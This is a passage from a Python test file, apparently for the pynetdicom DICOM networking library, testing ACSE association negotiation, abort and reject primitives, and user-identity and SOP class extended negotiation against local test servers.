self.assoc.dul.queue.get(block=False)
assert acse.is_release_requested() is False
acse.send_release(is_response=True)
assert acse.is_release_requested() is False
self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert acse.is_release_requested() is False
class TestNegotiationRequestor:
"""Test ACSE negotiation as requestor."""
def setup(self):
"""Run prior to each test"""
self.ae = None
self.assoc = DummyAssociation()
self.assoc.requestor.requested_contexts = [build_context("1.2.840.10008.1.1")]
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_no_requested_cx(self, caplog):
"""Test error logged if no requested contexts."""
ae = AE()
ae.add_requested_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="requestor")
assert assoc.requestor.requested_contexts == []
with caplog.at_level(logging.WARNING, logger="pynetdicom"):
assoc.acse._negotiate_as_requestor()
msg = (
"One or more requested presentation contexts must be set "
"prior to association negotiation"
)
assert msg in caplog.text
def test_receive_abort(self):
"""Test if A-ABORT received during association negotiation."""
primitive = A_ABORT()
self.assoc.dul.queue.put(primitive)
assert self.assoc.is_aborted is False
assert self.assoc.is_killed is False
acse = ACSE(self.assoc)
acse._negotiate_as_requestor()
assert self.assoc.is_aborted is True
assert self.assoc.dul.is_killed is True
primitive = self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ASSOCIATE)
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
def test_receive_ap_abort(self):
"""Test if A-P-ABORT received during association negotiation."""
primitive = A_P_ABORT()
self.assoc.dul.queue.put(primitive)
assert self.assoc.is_aborted is False
assert self.assoc.is_killed is False
acse = ACSE(self.assoc)
acse._negotiate_as_requestor()
assert self.assoc.is_aborted is True
assert self.assoc.dul.is_killed is True
primitive = self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ASSOCIATE)
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
def test_receive_other(self):
"""Test if invalid received during association negotiation."""
primitive = A_RELEASE()
self.assoc.dul.queue.put(primitive)
assert self.assoc.is_aborted is False
assert self.assoc.is_killed is False
acse = ACSE(self.assoc)
acse._negotiate_as_requestor()
assert self.assoc.is_aborted is False
assert self.assoc.dul.is_killed is True
primitive = self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ASSOCIATE)
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
def test_receive_unknown_result(self):
"""Test abort if A-ASSOCIATE result is unknown."""
primitive = A_ASSOCIATE()
primitive._result = 0xFF
self.assoc.dul.queue.put(primitive)
assert self.assoc.is_aborted is False
assert self.assoc.is_killed is False
acse = ACSE(self.assoc)
acse._negotiate_as_requestor()
primitive = self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ASSOCIATE)
assert self.assoc.is_aborted is True
assert self.assoc.is_killed is True
primitive = self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ABORT)
assert primitive.abort_source == 0x02
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
def test_receive_reject(self):
"""Test kill if A-ASSOCIATE result is rejection."""
primitive = A_ASSOCIATE()
primitive._result = 0x01
primitive._result_source = 0x02
primitive._diagnostic = 0x01
self.assoc.dul.queue.put(primitive)
assert self.assoc.is_aborted is False
assert self.assoc.is_killed is False
assert self.assoc.is_rejected is False
acse = ACSE(self.assoc)
acse._negotiate_as_requestor()
primitive = self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ASSOCIATE)
assert self.assoc.is_aborted is False
assert self.assoc.is_rejected is True
assert self.assoc.is_established is False
assert self.assoc.dul.is_killed is True
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
def test_receive_accept(self):
"""Test establishment if A-ASSOCIATE result is acceptance."""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.add_requested_context(Verification)
assoc = ae.associate("localhost", 11112)
assert assoc.is_established is True
assoc.release()
scp.shutdown()
class TestNegotiationAcceptor:
"""Test ACSE negotiation as acceptor."""
def setup(self):
self.ae = None
def teardown(self):
if self.ae:
self.ae.shutdown()
def test_response_has_rejected(self):
"""Test that the A-ASSOCIATE-AC contains rejected contexts."""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.add_requested_context(Verification)
ae.add_requested_context(CTImageStorage)
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
pcdrl = assoc.acceptor.get_contexts("pcdrl")
cxs = {cx.context_id: cx for cx in pcdrl}
assert 3 in cxs
assert 0x03 == cxs[3].result
assoc.release()
assert assoc.is_released
scp.shutdown()
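# (result, source, valid diagnostic codes) combinations accepted by ACSE.send_reject()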
REFERENCE_REJECT_GOOD = [
(0x01, 0x01, (0x01, 0x02, 0x03, 0x07)),
(0x02, 0x01, (0x01, 0x02, 0x03, 0x07)),
(0x01, 0x02, (0x01, 0x02)),
(0x02, 0x02, (0x01, 0x02)),
(0x01, 0x03, (0x01, 0x02)),
(0x02, 0x03, (0x01, 0x02)),
]
class TestPrimitiveConstruction:
"""Test the primitive builders"""
def setup(self):
self.assoc = DummyAssociation()
self.assoc.requestor.requested_contexts = [build_context("1.2.840.10008.1.1")]
def test_send_request(self):
"""Test A-ASSOCIATE (rq) construction and sending"""
acse = ACSE(self.assoc)
role = SCP_SCU_RoleSelectionNegotiation()
role.sop_class_uid = "1.2.840.10008.1.1"
role.scu_role = True
role.scp_role = False
self.assoc.requestor.add_negotiation_item(role)
acse.send_request()
primitive = self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ASSOCIATE)
assert primitive.application_context_name == "1.2.840.10008.3.1.1.1"
assert primitive.calling_ae_title == "TEST_LOCAL"
assert primitive.called_ae_title == "TEST_REMOTE"
assert primitive.calling_presentation_address == ("127.0.0.1", 11112)
assert primitive.called_presentation_address == ("127.0.0.2", 11113)
cx = primitive.presentation_context_definition_list
assert len(cx) == 1
assert cx[0].abstract_syntax == "1.2.840.10008.1.1"
user_info = primitive.user_information
assert len(user_info) == 3
for item in user_info:
if isinstance(item, MaximumLengthNotification):
assert item.maximum_length_received == 31682
elif isinstance(item, ImplementationClassUIDNotification):
assert item.implementation_class_uid == (PYNETDICOM_IMPLEMENTATION_UID)
elif isinstance(item, ImplementationVersionNameNotification):
assert item.implementation_version_name == (
PYNETDICOM_IMPLEMENTATION_VERSION.encode("ascii")
)
elif isinstance(item, SCP_SCU_RoleSelectionNegotiation):
assert item.sop_class_uid == "1.2.840.10008.1.1"
assert item.scu_role is True
assert item.scp_role is False
@pytest.mark.parametrize("source", (0x00, 0x02))
def test_send_abort(self, source):
"""Test A-ABORT construction and sending"""
acse = ACSE(self.assoc)
acse.send_abort(source)
primitive = self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ABORT)
assert primitive.abort_source == source
def test_send_abort_raises(self):
"""Test A-ABORT construction fails for invalid source"""
acse = ACSE(self.assoc)
msg = r"Invalid 'source' parameter value"
with pytest.raises(ValueError, match=msg):
acse.send_abort(0x01)
@pytest.mark.parametrize("reason", (0x00, 0x01, 0x02, 0x04, 0x05, 0x06))
def test_send_ap_abort(self, reason):
"""Test A-P-ABORT construction and sending"""
acse = ACSE(self.assoc)
acse.send_ap_abort(reason)
primitive = self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_P_ABORT)
assert primitive.provider_reason == reason
def test_send_ap_abort_raises(self):
"""Test A-P-ABORT construction fails for invalid reason"""
acse = ACSE(self.assoc)
msg = r"Invalid 'reason' parameter value"
with pytest.raises(ValueError, match=msg):
acse.send_ap_abort(0x03)
@pytest.mark.parametrize("result, source, reasons", REFERENCE_REJECT_GOOD)
def test_send_reject(self, result, source, reasons):
"""Test A-ASSOCIATE (rj) construction and sending"""
acse = ACSE(self.assoc)
for reason in reasons:
acse.send_reject(result, source, reason)
primitive = self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ASSOCIATE)
assert primitive.result == result
assert primitive.result_source == source
assert primitive.diagnostic == reason
def test_send_reject_raises(self):
"""Test A-ASSOCIATE (rj) construction invalid values raise exception"""
acse = ACSE(self.assoc)
msg = r"Invalid 'result' parameter value"
with pytest.raises(ValueError, match=msg):
acse.send_reject(0x00, 0x00, 0x00)
msg = r"Invalid 'source' parameter value"
with pytest.raises(ValueError, match=msg):
acse.send_reject(0x01, 0x00, 0x00)
msg = r"Invalid 'diagnostic' parameter value"
with pytest.raises(ValueError, match=msg):
acse.send_reject(0x01, 0x01, 0x00)
def test_send_release(self):
"""Test A-RELEASE construction and sending"""
acse = ACSE(self.assoc)
acse.send_release(is_response=False)
primitive = self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_RELEASE)
assert primitive.result is None
acse.send_release(is_response=True)
primitive = self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_RELEASE)
assert primitive.result == "affirmative"
def test_send_accept(self):
"""Test A-ASSOCIATE (ac) construction and sending"""
acse = ACSE(self.assoc)
# So we have the request available
acse.send_request()
self.assoc.accepted_contexts = [build_context("1.2.840.10008.1.1")]
self.assoc.rejected_contexts = []
acse.send_accept()
self.assoc.dul.queue.get() # The request
primitive = self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert isinstance(primitive, A_ASSOCIATE)
assert primitive.application_context_name == "1.2.840.10008.3.1.1.1"
assert primitive.calling_ae_title == "TEST_LOCAL"
assert primitive.called_ae_title == "TEST_REMOTE"
assert primitive.result == 0x00
assert primitive.result_source == 0x01
cx = primitive.presentation_context_definition_results_list
assert len(cx) == 1
assert cx[0].abstract_syntax == "1.2.840.10008.1.1"
REFERENCE_USER_IDENTITY_REQUEST = [
# (Request, response)
# Request: (ID type, primary field, secondary field, req_response)
# Response: (is_valid, server response)
# Username
# (User ID Type, Primary Field, Secondary Field, Response Requested)
# (Is valid, positive response value)
((1, b"username", b"", False), (True, b"\x01\x01")),
((1, b"username", b"", True), (True, b"\x01\x01")),
((1, b"username", b"invalid", False), (True, b"\x01\x01")),
((1, b"username", b"invalid", True), (True, b"\x01\x01")),
# Username and password
((2, b"username", b"", False), (True, b"\x01\x02")),
((2, b"username", b"", True), (True, b"\x01\x02")),
((2, b"username", b"password", False), (True, b"\x01\x02")),
((2, b"username", b"password", True), (True, b"\x01\x02")),
# Kerberos service ticket
((3, b"\x00\x03", b"", False), (True, b"\x01\x03")),
((3, b"\x00\x03", b"", True), (True, b"\x01\x03")),
((3, b"\x00\x03", b"invalid", False), (True, b"\x01\x03")),
((3, b"\x00\x03", b"invalid", True), (True, b"\x01\x03")),
# SAML assertion
((4, b"\x00\x04", b"", False), (True, b"\x01\x04")),
((4, b"\x00\x04", b"", True), (True, b"\x01\x04")),
((4, b"\x00\x04", b"invalid", False), (True, b"\x01\x04")),
((4, b"\x00\x04", b"invalid", True), (True, b"\x01\x04")),
# JSON web token
((5, b"\x00\x05", b"", False), (True, b"\x01\x05")),
((5, b"\x00\x05", b"", True), (True, b"\x01\x05")),
((5, b"\x00\x05", b"invalid", False), (True, b"\x01\x05")),
((5, b"\x00\x05", b"invalid", True), (True, b"\x01\x05")),
]
class TestUserIdentityNegotiation:
"""Tests for User Identity Negotiation."""
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
@pytest.mark.parametrize("req, rsp", REFERENCE_USER_IDENTITY_REQUEST)
def test_check_usrid_not_implemented(self, req, rsp):
"""Check _check_user_identity if user hasn't implemented."""
self.ae = ae = AE()
ae.add_requested_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="requestor")
item = UserIdentityNegotiation()
item.user_identity_type = req[0]
item.primary_field = req[1]
item.secondary_field = req[2]
item.positive_response_requested = req[3]
assoc.requestor.add_negotiation_item(item)
is_valid, response = assoc.acse._check_user_identity()
assert is_valid is True
assert response is None
@pytest.mark.parametrize("req, rsp", REFERENCE_USER_IDENTITY_REQUEST)
def test_check_usrid_not_authorised(self, req, rsp):
"""Check _check_user_identity if requestor not authorised"""
def handle(event):
return False, rsp[1]
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 2
ae.dimse_timeout = 2
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
item = UserIdentityNegotiation()
item.user_identity_type = req[0]
item.primary_field = req[1]
item.secondary_field = req[2]
item.positive_response_requested = req[3]
scp_assoc = scp.active_associations[0]
scp_assoc.requestor.primitive.user_information.append(item)
is_valid, response = scp_assoc.acse._check_user_identity()
assert is_valid is False
assert response is None
assoc.release()
scp.shutdown()
@pytest.mark.parametrize("req, rsp", REFERENCE_USER_IDENTITY_REQUEST)
def test_check_usrid_authorised(self, req, rsp):
"""Check _check_user_identity if requestor authorised"""
def handle(event):
return True, rsp[1]
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
item = UserIdentityNegotiation()
item.user_identity_type = req[0]
item.primary_field = req[1]
item.secondary_field = req[2]
item.positive_response_requested = req[3]
scp_assoc = scp.active_associations[0]
scp_assoc.requestor.primitive.user_information.append(item)
is_valid, response = scp_assoc.acse._check_user_identity()
assert is_valid is True
if req[3] is True and req[0] in [3, 4, 5]:
assert isinstance(response, UserIdentityNegotiation)
assert response.server_response == rsp[1]
else:
assert response is None
assoc.release()
scp.shutdown()
def test_check_usrid_callback_exception(self):
"""Check _check_user_identity if exception in callback"""
def handle(event):
raise ValueError
return True, rsp[1]
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
item = UserIdentityNegotiation()
item.user_identity_type = 1
item.primary_field = b"test"
item.secondary_field = b"test"
item.positive_response_requested = True
scp_assoc = scp.active_associations[0]
scp_assoc.requestor.primitive.user_information.append(item)
is_valid, response = scp_assoc.acse._check_user_identity()
assert is_valid is False
assert response is None
assoc.release()
scp.shutdown()
def test_check_usrid_none(self):
"""Check _check_user_identity if exception in callback"""
def handle(event):
raise ValueError
return True, rsp[1]
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
scp_assoc = scp.active_associations[0]
is_valid, response = scp_assoc.acse._check_user_identity()
assert is_valid is True
assert response is None
assoc.release()
scp.shutdown()
def test_check_usrid_server_response_exception(self):
"""Check _check_user_identity exception in setting server response"""
def handle(event):
return True, 123
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
item = UserIdentityNegotiation()
item.user_identity_type = 3
item.primary_field = b"test"
item.secondary_field = b"test"
item.positive_response_requested = True
scp_assoc = scp.active_associations[0]
scp_assoc.requestor.primitive.user_information.append(item)
is_valid, response = scp_assoc.acse._check_user_identity()
assert is_valid is True
assert response is None
assoc.release()
scp.shutdown()
@pytest.mark.parametrize("req, rsp", REFERENCE_USER_IDENTITY_REQUEST)
def test_handler(self, req, rsp):
"""Test the handler bound to evt.EVT_USER_ID"""
attrs = {}
def handle(event):
attrs["assoc"] = event.assoc
attrs["user_id_type"] = event.user_id_type
attrs["primary_field"] = event.primary_field
attrs["secondary_field"] = event.secondary_field
return True, rsp[1]
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
item = UserIdentityNegotiation()
item.user_identity_type = req[0]
item.primary_field = req[1]
item.secondary_field = req[2]
item.positive_response_requested = req[3]
scp_assoc = scp.active_associations[0]
scp_assoc.requestor.primitive.user_information.append(item)
is_valid, response = scp_assoc.acse._check_user_identity()
assert is_valid is True
if req[3] is True and req[0] in [3, 4, 5]:
assert isinstance(response, UserIdentityNegotiation)
assert response.server_response == rsp[1]
else:
assert response is None
assoc.release()
assert attrs["user_id_type"] == req[0]
assert attrs["primary_field"] == req[1]
assert attrs["secondary_field"] == req[2]
assert attrs["assoc"] == scp_assoc
scp.shutdown()
def test_functional_authorised_response(self):
"""Test a functional workflow where the user is authorised."""
def handle(event):
return True, b"\x00\x01"
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
item = UserIdentityNegotiation()
item.user_identity_type = 3
item.primary_field = b"test"
item.secondary_field = b"test"
item.positive_response_requested = True
assoc = ae.associate("localhost", 11112, ext_neg=[item])
assert assoc.is_established
assoc.release()
scp.shutdown()
def test_functional_authorised_no_response(self):
"""Test a functional workflow where the user is authorised."""
def handle(event):
return True, None
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
item = UserIdentityNegotiation()
item.user_identity_type = 3
item.primary_field = b"test"
item.secondary_field = b"test"
item.positive_response_requested = True
assoc = ae.associate("localhost", 11112, ext_neg=[item])
assert assoc.is_established
assoc.release()
scp.shutdown()
def test_functional_not_authorised(self):
"""Test a functional workflow where the user isn't authorised."""
def handle(event):
return False, None
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
item = UserIdentityNegotiation()
item.user_identity_type = 1
item.primary_field = b"test"
item.secondary_field = b"test"
item.positive_response_requested = True
assoc = ae.associate("localhost", 11112, ext_neg=[item])
assert assoc.is_rejected
scp.shutdown()
def test_req_response_reject(self):
"""Test requestor response if assoc rejected."""
def handle(event):
return True, b"\x00\x01"
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.require_calling_aet = ["HAHA NOPE"]
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
item = UserIdentityNegotiation()
item.user_identity_type = 3
item.primary_field = b"test"
item.secondary_field = b"test"
item.positive_response_requested = True
assoc = ae.associate("localhost", 11112, ext_neg=[item])
assert assoc.is_rejected
assert assoc.acceptor.user_identity is None
assoc.release()
scp.shutdown()
def test_req_response_no_user_identity(self):
"""Test requestor response if no response from acceptor."""
def handle(event):
return True, None
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
item = UserIdentityNegotiation()
item.user_identity_type = 3
item.primary_field = b"test"
item.secondary_field = b"test"
item.positive_response_requested = True
assoc = ae.associate("localhost", 11112, ext_neg=[item])
assert assoc.is_established
assert assoc.acceptor.user_identity is None
assoc.release()
scp.shutdown()
def test_req_response_user_identity(self):
"""Test requestor response if assoc rejected."""
def handle(event):
return True, b"\x00\x01"
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
item = UserIdentityNegotiation()
item.user_identity_type = 3
item.primary_field = b"test"
item.secondary_field = b"test"
item.positive_response_requested = True
assoc = ae.associate("localhost", 11112, ext_neg=[item])
assert assoc.is_established
assert assoc.acceptor.user_identity.server_response == b"\x00\x01"
assoc.release()
scp.shutdown()
@pytest.mark.parametrize("req, rsp", REFERENCE_USER_IDENTITY_REQUEST)
def test_logging(self, req, rsp):
"""Test the logging output works with user identity"""
def handle(event):
return True, rsp[1]
handlers = [(evt.EVT_USER_ID, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
item = UserIdentityNegotiation()
item.user_identity_type = req[0]
item.primary_field = req[1]
if req[0] == 2:
item.secondary_field = req[2] or b"someval"
else:
item.secondary_field = req[2]
item.positive_response_requested = req[3]
assoc = ae.associate("localhost", 11112, ext_neg=[item])
if assoc.is_established:
assoc.release()
scp.shutdown()
class TestSOPClassExtendedNegotiation:
"""Tests for SOP Class Extended Negotiation."""
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_check_ext_no_req(self):
"""Test the an empty SOP Extended request"""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {}
scp_assoc = scp.ae.active_associations[0]
rsp = scp_assoc.acse._check_sop_class_extended()
assert rsp == []
assoc.release()
scp.shutdown()
def test_check_ext_default(self):
"""Test the default handler bound to evt.EVT_SOP_EXTENDED"""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {
"1.2.3": b"\x00\x01",
"1.2.4": b"\x00\x02",
}
scp_assoc = scp.active_associations[0]
for kk, vv in req.items():
item = SOPClassExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_application_information = vv
scp_assoc.requestor.user_information.append(item)
rsp = scp_assoc.acse._check_sop_class_extended()
assert rsp == []
scp.shutdown()
def test_check_ext_user_implemented_none(self):
"""Test the handler returning the request"""
def handle(event):
return event.app_info
handlers = [(evt.EVT_SOP_EXTENDED, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {
"1.2.3": b"\x00\x01",
"1.2.4": b"\x00\x02",
}
scp_assoc = scp.active_associations[0]
for kk, vv in req.items():
item = SOPClassExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_application_information = vv
scp_assoc.requestor.user_information.append(item)
rsp = scp_assoc.acse._check_sop_class_extended()
assert len(rsp) == 2
# Can't guarantee order
for item in rsp:
if item.sop_class_uid == "1.2.3":
assert item.service_class_application_information == b"\x00\x01"
else:
assert item.sop_class_uid == "1.2.4"
assert item.service_class_application_information == b"\x00\x02"
assoc.release()
scp.shutdown()
def test_check_ext_bad_implemented_raises(self):
"""Test exception raised by handler"""
def handle(event):
raise ValueError
return event.app_info
handlers = [(evt.EVT_SOP_EXTENDED, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {
"1.2.3": b"\x00\x01",
"1.2.4": b"\x00\x02",
}
scp_assoc = scp.active_associations[0]
for kk, vv in req.items():
item = SOPClassExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_application_information = vv
scp_assoc.requestor.user_information.append(item)
rsp = scp_assoc.acse._check_sop_class_extended()
assert rsp == []
assoc.release()
scp.shutdown()
def test_check_ext_bad_implemented_type(self):
"""Test bad type returned by handler"""
def handle(event):
return b"\x01\x02"
handlers = [(evt.EVT_SOP_EXTENDED, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {
"1.2.3": b"\x00\x01",
"1.2.4": b"\x00\x02",
}
scp_assoc = scp.active_associations[0]
for kk, vv in req.items():
item = SOPClassExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_application_information = vv
scp_assoc.requestor.user_information.append(item)
rsp = scp_assoc.acse._check_sop_class_extended()
assert rsp == []
assoc.release()
scp.shutdown()
def test_check_ext_bad_implemented_item_value(self):
"""Test bad value returned by handler"""
def handle(event):
out = {}
for k, v in event.app_info.items():
if k == "1.2.3":
out[k] = 1234
else:
out[k] = v
return out
handlers = [(evt.EVT_SOP_EXTENDED, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
req = {
"1.2.3": b"\x00\x01",
"1.2.4": b"\x00\x02",
}
scp_assoc = scp.active_associations[0]
for kk, vv in req.items():
item = SOPClassExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_application_information = vv
scp_assoc.requestor.user_information.append(item)
rsp = scp_assoc.acse._check_sop_class_extended()
assert len(rsp) == 1
assert rsp[0].sop_class_uid == "1.2.4"
assert rsp[0].service_class_application_information == b"\x00\x02"
assoc.release()
scp.shutdown()
def test_functional_no_response(self):
"""Test a functional workflow with no response."""
attrs = {}
def handle(event):
attrs["app_info"] = event.app_info
return None
handlers = [(evt.EVT_SOP_EXTENDED, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
ext_neg = []
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.3"
item.service_class_application_information = b"\x00\x01"
ext_neg.append(item)
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.4"
item.service_class_application_information = b"\x00\x02"
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_established
assoc.release()
app_info = attrs["app_info"]
for k, v in app_info.items():
if k == "1.2.3":
assert v == b"\x00\x01"
else:
assert k == "1.2.4"
assert v == b"\x00\x02"
scp.shutdown()
def test_functional_response(self):
"""Test a functional workflow with response."""
def handle(event):
return event.app_info
handlers = [(evt.EVT_SOP_EXTENDED, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
ext_neg = []
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.3"
item.service_class_application_information = b"\x00\x01"
ext_neg.append(item)
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.4"
item.service_class_application_information = b"\x00\x02"
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_established
assoc.release()
scp.shutdown()
def test_req_response_reject(self):
"""Test requestor response if assoc rejected."""
def handle(event):
return event.app_info
handlers = [(evt.EVT_SOP_EXTENDED, handle)]
self.ae = ae = AE()
ae.require_calling_aet = ["HAHA NOPE"]
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
ext_neg = []
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.3"
item.service_class_application_information = b"\x00\x01"
ext_neg.append(item)
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.4"
item.service_class_application_information = b"\x00\x02"
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_rejected
assert assoc.acceptor.sop_class_extended == {}
assoc.release()
scp.shutdown()
def test_req_response_no_response(self):
"""Test requestor response if no response from acceptor."""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.acse_timeout = 5
ae.dimse_timeout = 5
ext_neg = []
item = SOPClassExtendedNegotiation()
item.sop_class_uid = "1.2.3"
item.service_class_application_information = b"\x00\x01"
